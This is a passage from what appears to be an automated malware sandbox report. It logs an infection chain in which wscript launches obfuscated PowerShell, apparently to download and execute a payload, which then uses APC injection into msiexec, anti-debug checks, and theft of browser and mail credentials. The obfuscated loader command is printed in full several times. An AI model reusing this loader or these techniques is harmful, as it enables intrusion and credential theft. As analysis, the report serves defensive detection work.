00000007.00000002.2634220952.0000000004FAA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2634220952.0000000005009000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: bhv528A.tmp.11.dr	Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: wscript.exe, 00000000.00000002.1356895387.0000023D99824000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceStoppedOKvmicshutdownvmicshutdownUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemFRONTDESK-PCvmicshutdown
Source: powershell.exe, 00000002.00000002.1531059954.000001C4FCFD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCe}

Source: C:\Windows\SysWOW64\msiexec.exe

API call chain: ExitProcess graph end node

graph_12-34016

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_04C28860 LdrInitializeThunk,

4_2_04C28860

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 7_2_209060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_209060E2

Source: C:\Windows\SysWOW64\msiexec.exe

11_2_0040DD85

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

11_2_004044A4

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 7_2_20904AB4 mov eax, dword ptr fs:[00000030h]

7_2_20904AB4

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 7_2_2090724E GetProcessHeap,

7_2_2090724E

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_209060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_209060E2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_20902639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_20902639
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_20902B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_20902B1C

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7540.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTR

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vzonifxrpknexemx"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xbbfjqhklsfrakibsnra"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#rastafarian reservoiret spermatophobia zwitterions nonevading paragraferes #>;$forjttelserne='horsehair';<#humeral grainier embathe agaty #>;$maksimale188=$genanvendelsesprocessernconsumably+$host.ui; function adiabaticlly($megafonens){if ($maksimale188) {$mahajan++;}$minim=$genanvendelsesprocesserntolerability+$megafonens.'length'-$mahajan; for( $genanvendelsesprocesser=3;$genanvendelsesprocesser -lt $minim;$genanvendelsesprocesser+=4){$farings=$genanvendelsesprocesser;$alma+=$megafonens[$genanvendelsesprocesser];$erantissenes='nemhed';}$alma;}function vandende($feriers){ .($bibliografisk) ($feriers);}$mealymouthedness=adiabaticlly 'in msliorebzvani ndlpyrlfulaeni/sco ';$mealymouthedness+=adiabaticlly 'fli5udk.con0nel stu(devwb gi den rodskroampw tos po re ntiltuge i l1 li0.ha. la0 ,i;ann drywti ib.onund6ham4aff;oxy satxund6 gi4ung;dam misrdiavsva:the1tia3,ou1inf.til0t t)ma. bhigsidesamcrefk fiofa,/ vi2 ge0for1s,o0fll0 pe1oft0 b1 i stef oicherstieshaftv.oflyx .t/cen1 b 3 co1s m.t.l0uds ';$verdeners=adiabaticlly 'se u ass b eti,r an-junaforg evetrsndept to ';$belard=adiabaticlly ' udhnint a.tli pidis o:st /alg/undsovefwor4 o l sp.jacsserhbaaoingpbr./ muz brwdy ab lb p,mf drud,m tupind/ kodi ficyswkria ,rnb sige,.sacpbeif dabudt ';$preindisposition=adiabaticlly 'p,e>neu ';$bibliografisk=adiabaticlly 'c ii .neaurxvel ';$formaalene='celiectomy';$ujordiskes='\taxlessly199.cho';vandende (adiabaticlly 'alp$braghiel llo h bsidamyclopl:perre eeselfjanrlucaun carstparofo mwh egent,asrbulyhs 1pos8 un8,ne= no$ eneunvncrivom : ffaekip php odmetas itdisa la+sy $ u ucatjjouog,irfordoveinedswrykkeeefedssmi ');vandende (adiabaticlly ' h $ rgs,il svo onbtila .ala.d:.hafordo,lerrbes ork dn kvi,ngnansgopksa troxfeskos daudorla.kt nta titboue fyrudksdel=try$ .nbf rerholeddadirr,andhol.surspo pgull ori ent pe(t n$ exp er.rne .ti unnsepd lii lestr.p fsosynsto ilikthosikl,otrinsv )dul ');vandende (adiabaticlly 'gen[klunlileswati s. nsf oeimprshav oitrfchanec,up epoat isignkurt semyasa ron t asilgvalesilrgra]fus:fam:ab srepeka,cstaukn rinoizootludypatpstorps.o frtdeaozencsologr ldre evi=s b utu[.urnfodedantsan.lumss ae securiuspar r iunjt dykdep,dorpaaoliltunco,ubc saofaclr,gt nyankpskueafs]erk:abo:d atsk lgurssty1ran2sle ');$belard=$forskningsresultaters[0];$estimeringens=(adiabaticlly '.nd$ bagd slsanoskrbantaextltol:sknmindael ub rnaled xpeho,rvej=cornremevecwbu - akointb injtaneskic eatrep hiss opyln sunrtrefeattmodo.undnbese aft er. enwforeungb omcs,uluncivu edolnmodtgen ');vandende ($estimeringens);vandende (adiabaticlly 'zak$usamanrafodu fonim,dil eforrind.vaahf.oe llatild unesymrbeestyr[ .t$ hav meo trtrad nesa n ape leroffsrec]k r=har$insm sse rabanlregy l minjo spu latmish arega df undele gjs bas ,h ');$oxyhematin=adiabaticlly 'ava$unombluaevnu pn fudfeleforrt n. undstyobrnw,izn sklu,wovkka hydchof.rviba.lskaerig(she$vejbunq
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#rastafarian reservoiret spermatophobia zwitterions nonevading paragraferes #>;$forjttelserne='horsehair';<#humeral grainier embathe agaty #>;$maksimale188=$genanvendelsesprocessernconsumably+$host.ui; function adiabaticlly($megafonens){if ($maksimale188) {$mahajan++;}$minim=$genanvendelsesprocesserntolerability+$megafonens.'length'-$mahajan; for( $genanvendelsesprocesser=3;$genanvendelsesprocesser -lt $minim;$genanvendelsesprocesser+=4){$farings=$genanvendelsesprocesser;$alma+=$megafonens[$genanvendelsesprocesser];$erantissenes='nemhed';}$alma;}function vandende($feriers){ .($bibliografisk) ($feriers);}$mealymouthedness=adiabaticlly 'in msliorebzvani ndlpyrlfulaeni/sco ';$mealymouthedness+=adiabaticlly 'fli5udk.con0nel stu(devwb gi den rodskroampw tos po re ntiltuge i l1 li0.ha. la0 ,i;ann drywti ib.onund6ham4aff;oxy satxund6 gi4ung;dam misrdiavsva:the1tia3,ou1inf.til0t t)ma. bhigsidesamcrefk fiofa,/ vi2 ge0for1s,o0fll0 pe1oft0 b1 i stef oicherstieshaftv.oflyx .t/cen1 b 3 co1s m.t.l0uds ';$verdeners=adiabaticlly 'se u ass b eti,r an-junaforg evetrsndept to ';$belard=adiabaticlly ' udhnint a.tli pidis o:st /alg/undsovefwor4 o l sp.jacsserhbaaoingpbr./ muz brwdy ab lb p,mf drud,m tupind/ kodi ficyswkria ,rnb sige,.sacpbeif dabudt ';$preindisposition=adiabaticlly 'p,e>neu ';$bibliografisk=adiabaticlly 'c ii .neaurxvel ';$formaalene='celiectomy';$ujordiskes='\taxlessly199.cho';vandende (adiabaticlly 'alp$braghiel llo h bsidamyclopl:perre eeselfjanrlucaun carstparofo mwh egent,asrbulyhs 1pos8 un8,ne= no$ eneunvncrivom : ffaekip php odmetas itdisa la+sy $ u ucatjjouog,irfordoveinedswrykkeeefedssmi ');vandende (adiabaticlly ' h $ rgs,il svo onbtila .ala.d:.hafordo,lerrbes ork dn kvi,ngnansgopksa troxfeskos daudorla.kt nta titboue fyrudksdel=try$ .nbf rerholeddadirr,andhol.surspo pgull ori ent pe(t n$ exp er.rne .ti unnsepd lii lestr.p fsosynsto ilikthosikl,otrinsv )dul ');vandende (adiabaticlly 'gen[klunlileswati s. nsf oeimprshav oitrfchanec,up epoat isignkurt semyasa ron t asilgvalesilrgra]fus:fam:ab srepeka,cstaukn rinoizootludypatpstorps.o frtdeaozencsologr ldre evi=s b utu[.urnfodedantsan.lumss ae securiuspar r iunjt dykdep,dorpaaoliltunco,ubc saofaclr,gt nyankpskueafs]erk:abo:d atsk lgurssty1ran2sle ');$belard=$forskningsresultaters[0];$estimeringens=(adiabaticlly '.nd$ bagd slsanoskrbantaextltol:sknmindael ub rnaled xpeho,rvej=cornremevecwbu - akointb injtaneskic eatrep hiss opyln sunrtrefeattmodo.undnbese aft er. enwforeungb omcs,uluncivu edolnmodtgen ');vandende ($estimeringens);vandende (adiabaticlly 'zak$usamanrafodu fonim,dil eforrind.vaahf.oe llatild unesymrbeestyr[ .t$ hav meo trtrad nesa n ape leroffsrec]k r=har$insm sse rabanlregy l minjo spu latmish arega df undele gjs bas ,h ');$oxyhematin=adiabaticlly 'ava$unombluaevnu pn fudfeleforrt n. undstyobrnw,izn sklu,wovkka hydchof.rviba.lskaerig(she$vejbunq
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#rastafarian reservoiret spermatophobia zwitterions nonevading paragraferes #>;$forjttelserne='horsehair';<#humeral grainier embathe agaty #>;$maksimale188=$genanvendelsesprocessernconsumably+$host.ui; function adiabaticlly($megafonens){if ($maksimale188) {$mahajan++;}$minim=$genanvendelsesprocesserntolerability+$megafonens.'length'-$mahajan; for( $genanvendelsesprocesser=3;$genanvendelsesprocesser -lt $minim;$genanvendelsesprocesser+=4){$farings=$genanvendelsesprocesser;$alma+=$megafonens[$genanvendelsesprocesser];$erantissenes='nemhed';}$alma;}function vandende($feriers){ .($bibliografisk) ($feriers);}$mealymouthedness=adiabaticlly 'in msliorebzvani ndlpyrlfulaeni/sco ';$mealymouthedness+=adiabaticlly 'fli5udk.con0nel stu(devwb gi den rodskroampw tos po re ntiltuge i l1 li0.ha. la0 ,i;ann drywti ib.onund6ham4aff;oxy satxund6 gi4ung;dam misrdiavsva:the1tia3,ou1inf.til0t t)ma. bhigsidesamcrefk fiofa,/ vi2 ge0for1s,o0fll0 pe1oft0 b1 i stef oicherstieshaftv.oflyx .t/cen1 b 3 co1s m.t.l0uds ';$verdeners=adiabaticlly 'se u ass b eti,r an-junaforg evetrsndept to ';$belard=adiabaticlly ' udhnint a.tli pidis o:st /alg/undsovefwor4 o l sp.jacsserhbaaoingpbr./ muz brwdy ab lb p,mf drud,m tupind/ kodi ficyswkria ,rnb sige,.sacpbeif dabudt ';$preindisposition=adiabaticlly 'p,e>neu ';$bibliografisk=adiabaticlly 'c ii .neaurxvel ';$formaalene='celiectomy';$ujordiskes='\taxlessly199.cho';vandende (adiabaticlly 'alp$braghiel llo h bsidamyclopl:perre eeselfjanrlucaun carstparofo mwh egent,asrbulyhs 1pos8 un8,ne= no$ eneunvncrivom : ffaekip php odmetas itdisa la+sy $ u ucatjjouog,irfordoveinedswrykkeeefedssmi ');vandende (adiabaticlly ' h $ rgs,il svo onbtila .ala.d:.hafordo,lerrbes ork dn kvi,ngnansgopksa troxfeskos daudorla.kt nta titboue fyrudksdel=try$ .nbf rerholeddadirr,andhol.surspo pgull ori ent pe(t n$ exp er.rne .ti unnsepd lii lestr.p fsosynsto ilikthosikl,otrinsv )dul ');vandende (adiabaticlly 'gen[klunlileswati s. nsf oeimprshav oitrfchanec,up epoat isignkurt semyasa ron t asilgvalesilrgra]fus:fam:ab srepeka,cstaukn rinoizootludypatpstorps.o frtdeaozencsologr ldre evi=s b utu[.urnfodedantsan.lumss ae securiuspar r iunjt dykdep,dorpaaoliltunco,ubc saofaclr,gt nyankpskueafs]erk:abo:d atsk lgurssty1ran2sle ');$belard=$forskningsresultaters[0];$estimeringens=(adiabaticlly '.nd$ bagd slsanoskrbantaextltol:sknmindael ub rnaled xpeho,rvej=cornremevecwbu - akointb injtaneskic eatrep hiss opyln sunrtrefeattmodo.undnbese aft er. enwforeungb omcs,uluncivu edolnmodtgen ');vandende ($estimeringens);vandende (adiabaticlly 'zak$usamanrafodu fonim,dil eforrind.vaahf.oe llatild unesymrbeestyr[ .t$ hav meo trtrad nesa n ape leroffsrec]k r=har$insm sse rabanlregy l minjo spu latmish arega df undele gjs bas ,h ');$oxyhematin=adiabaticlly 'ava$unombluaevnu pn fudfeleforrt n. undstyobrnw,izn sklu,wovkka hydchof.rviba.lskaerig(she$vejbunq	Jump to behavior

Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manageru
Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerV
Source: msiexec.exe, 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 7_2_20902933 cpuid

7_2_20902933

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 7_2_20902264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_20902264

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 12_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

12_2_004082CD

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_0041739B GetVersionExW,

11_2_0041739B

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: Yara match	File source: 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1789395704.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1794834072.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 8140, type: MEMORYSTR

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: ESMTPPassword	12_2_004033F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword	12_2_00402DB3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword	12_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

